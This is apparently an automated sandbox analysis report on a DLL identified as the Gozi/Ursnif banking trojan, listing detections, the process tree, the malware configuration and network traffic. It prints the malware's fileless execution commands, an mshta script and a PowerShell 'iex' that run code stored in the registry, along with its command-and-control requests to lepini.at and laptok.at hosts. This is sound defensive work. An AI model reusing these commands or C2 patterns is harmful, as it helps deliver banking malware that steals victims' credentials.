Play interactive tour

Edit tour

Analysis Report sup11_dump.dll

Overview

General Information

Sample Name:	sup11_dump.dll
Analysis ID:	344607
MD5:	92bcb08ab6be032cd4a64ac1292c2d16
SHA1:	dd1ee07155768a8d4b0cb1ec3fa666b5ac7e2eed
SHA256:	50ec326918e3930b8099b483ecf0a44bebba1fc7013cc234f2fbc358acb26fe5
Tags:	dll
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Hooks registry keys query functions (used to hide registry keys)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 1892 cmdline: loaddll32.exe 'C:\Users\user\Desktop\sup11_dump.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

regsvr32.exe (PID: 4496 cmdline: regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 5824 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 5312 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 5712 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 3104 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6160 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6504 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6456 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5272 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 4220 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6388 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6220 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5132 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 6016 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5856 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "162", "system": "8846c72aab592bf132e9340368599fe0hh", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611719106", "user": "d095a5848695dc15e71ab15ce59a4257", "hash": "0x3cfb7f6d", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 6388	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 4496	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 10 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6388, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', ProcessId: 6220

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 6388

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6388, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline', ProcessId: 6220

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5824, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 5312

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: sup11_dump.dll

Avira: detected

Found malware configuration

Show sources

Source: regsvr32.exe.4496.1.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "162", "system": "8846c72aab592bf132e9340368599fe0hh", "size": "201280", "crc": "2", "action": "00000000", "id": "1100", "time": "1611719106", "user": "d095a5848695dc15e71ab15ce59a4257", "hash": "0x3cfb7f6d", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 8%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: sup11_dump.dll

Virustotal: Detection: 45%

Perma Link

Machine Learning detection for sample

Show sources

Source: sup11_dump.dll

Joe Sandbox ML: detected

Source: 1.2.regsvr32.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: sup11_dump.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.7:49740 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001F.00000002.419574555.000001D4F2870000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.428776969.0000026A53A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B94FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B805EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

Networking:

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

ASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/fMoOyVtNHyb2CKT5h4Jv/cOtoUxpSs_2B7b6ktW6/8gKDvU8GZHurEn2nukEHAM/mBRpHfezDBeLc/1Val8ISr/ggV1pjQswOiZEbQ3ehKxHJY/mND7st4_2F/zvqzs_2F7uy_2Bb6o/3NqBL4_2BCgu/Eg0dWIbsiNp/OTltsytgATJROU/sIZwRhOMX71zuqhRMKIgV/JJtVE_2FgKvOcqIw/srgqU3CK_2FbRdx/IT_2FypXirSM9LJx6a/KaX7JOhW_/2F_2FH9Scf70TsmxARuA/FJ_2FEzlHBdy_2BM3Si/ebVcIeLFS9doIWImMnNuIk/8e9XWr3pdJVnY/Lc7jY8hP/_2BxFf2skUqywtS/A HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMsK/QG5B0lq_2/BpfIpB91VJE6CEmZQm7M/PQN4vdDkebJ_2BGxKNI/VsKdR_2FzTa6vjFIkSkAZy/r8dnnf58olJ6u/p6WgAtg_/2FXj_2Baw19poatwg_2F2kO/3f5_2FyJS3/nBZ6Nmhf_2FEUX1qE/XHrQlN8gAX37/PR_2Fy_2B_2/BhmNEXvGPQ5mPx/Z35_2F9v0RKzbUs6X6gjG/o6gCLElU7pE_2Bpx/oRgBOdZRxgLD0_2/BNQ4L9i8wZtjCkBFgV/vbRDZhUKm/0qlCcD5z2Gyxth4kqVNJ/dA0aOC4 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/rFNKr2CGL/kXSQLJ4pLqCh1LXHR8pd/LghuFo_2Fz1_2Be9g4F/WXqLpHR1w1pWav92wE6yEv/uYPkaiYomq7al/rA1mR_2F/ERR1VtnRVC9Z9L97Yj0nEFv/RXcdmcZw3t/09S9mQ4TEGPoFg0wu/CB1TTO3K_2Fx/ES759oV_2F3/AqQYGPBuqK6lVx/HnWardAtMd40kxzRqiZ4c/ezlyaUtSbXNYPJd5/jFNmBUf7ol4D5iv/PAhhoqRwskHN_2BfyW/Qy04blpWl/1eFKv0iNVI2O85WUZxuE/12FPAo3Lux39x5EugSB/ZIqsnBNs_2B_2BTY3S2vKa/rTxfhO8bj/vDrid7bT/A HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/xN7Vn1nqjV06/Uoae0bry7tu/s480N1RigmgSZ7/ovhVgxM0v2lRZdUdmRPXr/2olZKjleSHMiCKnU/SGGkght_2BNMI_2/BdeG35GUXiZ0jGf3Nd/3Fyunz8gg/k2AMdUoBFgsyj_2BaOEu/BQnpHAOIwtJKSDTYnrI/w6kmi_2BgGuuwzJuTztW0W/4iuVF4d902ob0/E2PA6GSV/Sg1kbgn1io32otLr0SB6JL_/2BZcLfjHz0/pauFVWToc4OpmehUL/g9hTBcF9_2Fd/_2F0_2F2ETj/RAKC8_2FvCntWY/wuqDvU_2FGOflt850WrDr/FxIoV_2BeSB/Suhx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/9Dbk1WvXxj1sVm4yff/nk0pg4b0s/UVCKD_2BMZzstnnqhoFp/Ktn8x0OSRfno2WpW3u_/2FDol0BN3XO12yUJgBMYq6/iZh8WugGdwuvs/RKu1CLXP/1Z9vDFru5BWzbqKhcmT_2BM/Qv0FngLhqs/VDpS5UcoEsg1xls7_/2Bvy4JBL4QLN/K_2FtcmAOUK/sIfXs_2BO6Fp5q/oQH0xXcxqaH_2BOp0CawI/7aZdiKs11SUgIJU0/9Pv802DFLf2Wa7N/6q1aWSf7ymVrIOI4pW/il_2Fb_2F/JAX6Lfr2HK2GkQh4Lani/6J0JJGyWOdnxWHH/ueClpx2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at

Source: de-ch[1].htm.4.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.4.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.4.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var 